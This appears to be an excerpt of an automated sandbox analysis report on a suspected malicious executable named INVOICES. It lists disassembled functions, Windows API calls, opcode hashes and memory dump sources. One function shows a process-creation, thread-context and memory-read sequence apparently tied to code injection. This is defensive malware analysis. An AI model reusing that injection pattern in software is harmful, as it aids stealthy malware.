                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a53ce87126511b3e756c619e57390ef2871f83a7a8edc150bf44400c53c1fb46
                                                                                                                                  • Instruction ID: 3f159ab229b8ac690a3422fb0d89f2609a5069c279096a4019f14126e2d951a6
                                                                                                                                  • Opcode Fuzzy Hash: a53ce87126511b3e756c619e57390ef2871f83a7a8edc150bf44400c53c1fb46
                                                                                                                                  • Instruction Fuzzy Hash: 40F12871508304DFC714DF28C484A6ABBE5BFC9314F148A2EF89A9B251D779E945CF82
                                                                                                                                  Function 0075588C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __FF_MSGBANNER.LIBCMT ref: 007558A3
                                                                                                                                    • Part of subcall function 0075A2EB: __NMSG_WRITE.LIBCMT ref: 0075A312
                                                                                                                                    • Part of subcall function 0075A2EB: __NMSG_WRITE.LIBCMT ref: 0075A31C
                                                                                                                                  • __NMSG_WRITE.LIBCMT ref: 007558AA
                                                                                                                                    • Part of subcall function 0075A348: GetModuleFileNameW.KERNEL32(00000000,007F33BA,00000104,00000000,00000001,00000000), ref: 0075A3DA
                                                                                                                                    • Part of subcall function 0075A348: ___crtMessageBoxW.LIBCMT ref: 0075A488
                                                                                                                                    • Part of subcall function 0075321F: ___crtCorExitProcess.LIBCMT ref: 00753225
                                                                                                                                    • Part of subcall function 0075321F: ExitProcess.KERNEL32 ref: 0075322E
                                                                                                                                    • Part of subcall function 00758CA8: __getptd_noexit.LIBCMT ref: 00758CA8
                                                                                                                                  • RtlAllocateHeap.NTDLL(010B0000,00000000,00000001), ref: 007558CF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1372826849-0
                                                                                                                                  • Opcode ID: 72eca026657850499800f5350ce122827cc0e8f037444fd9ab14aeb39e97c3fc
                                                                                                                                  • Instruction ID: c4720f9726ed2b229b03d1439a2fa23d4113d442292849aca6e55a729f57e4ee
                                                                                                                                  • Opcode Fuzzy Hash: 72eca026657850499800f5350ce122827cc0e8f037444fd9ab14aeb39e97c3fc
                                                                                                                                  • Instruction Fuzzy Hash: 5D01D231240B01EBD61067749C2AAEE7358EF81763F100535FC01AE191DEFCAD088775
                                                                                                                                  Function 0079994B Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007995F1,?,?,?,?,?,00000004), ref: 00799964
                                                                                                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007995F1,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0079997A
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,007995F1,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00799981
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3397143404-0
                                                                                                                                  • Opcode ID: 86cbcc497fc3662fa005bc09da8b67915182bb4a6198412a9de12136dbbb21eb
                                                                                                                                  • Instruction ID: 92a72877dc28b9e0d52814c541dfb23e8d0a8e268a037b10acbe983e2b1f0cf4
                                                                                                                                  • Opcode Fuzzy Hash: 86cbcc497fc3662fa005bc09da8b67915182bb4a6198412a9de12136dbbb21eb
                                                                                                                                  • Instruction Fuzzy Hash: 3BE08632140218B7EB211B58EC09FDA7F58AB45B70F148324FB54790E087B52911979C
                                                                                                                                  Function 00798DB6 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 00798DC4
                                                                                                                                    • Part of subcall function 00752ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00759BA4), ref: 00752EE9
                                                                                                                                    • Part of subcall function 00752ED5: GetLastError.KERNEL32(00000000,?,00759BA4), ref: 00752EFB
                                                                                                                                  • _free.LIBCMT ref: 00798DD5
                                                                                                                                  • _free.LIBCMT ref: 00798DE7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 3221efda5ec1aeb3564d3aaca8a62a8878e7642d45a62f0f0d26450024f2f6e1
                                                                                                                                  • Instruction ID: d43a07c443184d7126750cbfe10e8a77df146777e253876652b3b45114bd4b5b
                                                                                                                                  • Opcode Fuzzy Hash: 3221efda5ec1aeb3564d3aaca8a62a8878e7642d45a62f0f0d26450024f2f6e1
                                                                                                                                  • Instruction Fuzzy Hash: AFE012A170160183DEA465787949ED313DC5F5E362B18081EB809D7583CE6CE8878164
                                                                                                                                  Function 0073AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: CALL
                                                                                                                                  • API String ID: 0-4196123274
                                                                                                                                  • Opcode ID: f5bdc1644546a002253d81942338be0ce06adf58b014f502abf746963edd2aea
                                                                                                                                  • Instruction ID: 8ff5357fcee77575ec843f897f73fbf05e2efc70888f724454337d112f003345
                                                                                                                                  • Opcode Fuzzy Hash: f5bdc1644546a002253d81942338be0ce06adf58b014f502abf746963edd2aea
                                                                                                                                  • Instruction Fuzzy Hash: 15224A70608301DFEB28DF14C495B6AB7E1BF84304F14896DE99A8B362D779ED45CB82
                                                                                                                                  Function 00737BB1 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                  • Opcode ID: 110dd0e2576012a0094b73eb3352dcde9e624fd67b43ab06109a497bb09d0b37
                                                                                                                                  • Instruction ID: 6f16e9c55e53fbb6d22dca3f007ff310d23daac342ae8a3a5c139e6573da8a29
                                                                                                                                  • Opcode Fuzzy Hash: 110dd0e2576012a0094b73eb3352dcde9e624fd67b43ab06109a497bb09d0b37
                                                                                                                                  • Instruction Fuzzy Hash: 9D31B8F1604506EFD728DF28D8D1D69F3A9FF48310B158629E915CB292DB74E850CBA0
                                                                                                                                  Function 0073492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • 74B1C8D0.UXTHEME ref: 00734992
                                                                                                                                    • Part of subcall function 007534EC: __lock.LIBCMT ref: 007534F2
                                                                                                                                    • Part of subcall function 007534EC: RtlDecodePointer.NTDLL(00000001), ref: 007534FE
                                                                                                                                    • Part of subcall function 007534EC: RtlEncodePointer.NTDLL(?), ref: 00753509
                                                                                                                                    • Part of subcall function 00734A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00734A73
                                                                                                                                    • Part of subcall function 00734A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00734A88
                                                                                                                                    • Part of subcall function 00733B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00733B7A
                                                                                                                                    • Part of subcall function 00733B4C: IsDebuggerPresent.KERNEL32 ref: 00733B8C
                                                                                                                                    • Part of subcall function 00733B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,007F52F8,007F52E0,?,?), ref: 00733BFD
                                                                                                                                    • Part of subcall function 00733B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00733C81
                                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007349D2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2688871447-0
                                                                                                                                  • Opcode ID: bf38d18ab89a0f8f514a16a6f33162842b05ba96497411424ec2b2e55ec0c689
                                                                                                                                  • Instruction ID: 558af151783c4783f5066cd785bd8a9bdd724a9127cfbbd10d7ceac8a41d8f76
                                                                                                                                  • Opcode Fuzzy Hash: bf38d18ab89a0f8f514a16a6f33162842b05ba96497411424ec2b2e55ec0c689
                                                                                                                                  • Instruction Fuzzy Hash: C81190B14143159BD300EF29EC4996AFFE8FB84710F10C61EF58597272DBB89648CB9A
                                                                                                                                  Function 00755516 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00758CA8: __getptd_noexit.LIBCMT ref: 00758CA8
                                                                                                                                  • __lock_file.LIBCMT ref: 0075555B
                                                                                                                                    • Part of subcall function 00756D8E: __lock.LIBCMT ref: 00756DB1
                                                                                                                                  • __fclose_nolock.LIBCMT ref: 00755566
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2800547568-0
                                                                                                                                  • Opcode ID: ff27a0fed0d108d8487d9cc0cc463525d12c76cee94d2ff69ea24e46e2fb76eb
                                                                                                                                  • Instruction ID: 518fef91e2d9b6326124197fe97ca09b83e93a26da99c118e4a52886eee4828c
                                                                                                                                  • Opcode Fuzzy Hash: ff27a0fed0d108d8487d9cc0cc463525d12c76cee94d2ff69ea24e46e2fb76eb
                                                                                                                                  • Instruction Fuzzy Hash: B7F09071901A04DBEB50AB75880A7EE67A36F40333F248249BC14AB1C1EFFC490D9B52
                                                                                                                                  Function 0094129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 00941A5B
                                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00941AF1
                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00941B13
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2438371351-0
                                                                                                                                  • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                                                                  • Instruction ID: 5965b45c387a248502fe5a80a08ef97a84abba5cf1438c9775bbdca5f9b26dbb
                                                                                                                                  • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                                                                  • Instruction Fuzzy Hash: 0712BD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                                                                                                  Function 00770005 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                  • Opcode ID: 3cabccc1e1fb22b53d002145ae8c69927998026dc891d1714fa5a54a4b3de18e
                                                                                                                                  • Instruction ID: 1c0b9ae01b99684331115036ea27160109e63704be34a75e973b10e63bd93677
                                                                                                                                  • Opcode Fuzzy Hash: 3cabccc1e1fb22b53d002145ae8c69927998026dc891d1714fa5a54a4b3de18e
                                                                                                                                  • Instruction Fuzzy Hash: 32413B74504341DFEB14DF14C489B1ABBE0BF45318F1988ACE9994B362C77AEC55CB92
                                                                                                                                  Function 00737CB3 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                  • Opcode ID: 30ef8d447fbdf0a5163e5a247deac19081f4f0f688b4fe2d178737b0a3cdba36
                                                                                                                                  • Instruction ID: 00ec930454f32dd587f6fd388c0c5eeb215297fc1140075d3e3557fa3a20427a
                                                                                                                                  • Opcode Fuzzy Hash: 30ef8d447fbdf0a5163e5a247deac19081f4f0f688b4fe2d178737b0a3cdba36
                                                                                                                                  • Instruction Fuzzy Hash: 332106B2604609EBDB245F21FC817A97BB8FF18351F21842DE987C9092EB3894D0D754
                                                                                                                                  Function 00734F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00734D13: FreeLibrary.KERNEL32(00000000,?), ref: 00734D4D
                                                                                                                                    • Part of subcall function 007553CB: __wfsopen.LIBCMT ref: 007553D6
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00734F6F
                                                                                                                                    • Part of subcall function 00734CC8: FreeLibrary.KERNEL32(00000000), ref: 00734D02
                                                                                                                                    • Part of subcall function 00734DD0: _memmove.LIBCMT ref: 00734E1A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1396898556-0
                                                                                                                                  • Opcode ID: 739a7faaa0eea00e0c53502f8504b47373c745cbfef9eac16977095586312dbc
                                                                                                                                  • Instruction ID: 54bcf6da6de282e90406b1bedba7d0a05f4e34957237f8b2f2430a21064d8fdb
                                                                                                                                  • Opcode Fuzzy Hash: 739a7faaa0eea00e0c53502f8504b47373c745cbfef9eac16977095586312dbc
                                                                                                                                  • Instruction Fuzzy Hash: C511EE3271060AEAEF28AF70DC1AFAD77A59F40700F148529F94196182DA799D159B60
                                                                                                                                  Function 007700DE Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                  • Opcode ID: 7d4de3f8c9f935c2dbdac73292217d43c2aa995a5faa20545ae0674c32b79cb0
                                                                                                                                  • Instruction ID: 1e5b683bc336448de625959656d294e4ed1755bdf615f642d431aa257b7eff9f
                                                                                                                                  • Opcode Fuzzy Hash: 7d4de3f8c9f935c2dbdac73292217d43c2aa995a5faa20545ae0674c32b79cb0
                                                                                                                                  • Instruction Fuzzy Hash: F52133B0508341DFDB14DF24C84AB5ABBE0BF88314F05896CE89A47762D739E819CB93
                                                                                                                                  Function 007549D3 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __lock_file.LIBCMT ref: 00754A16
                                                                                                                                    • Part of subcall function 00758CA8: __getptd_noexit.LIBCMT ref: 00758CA8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
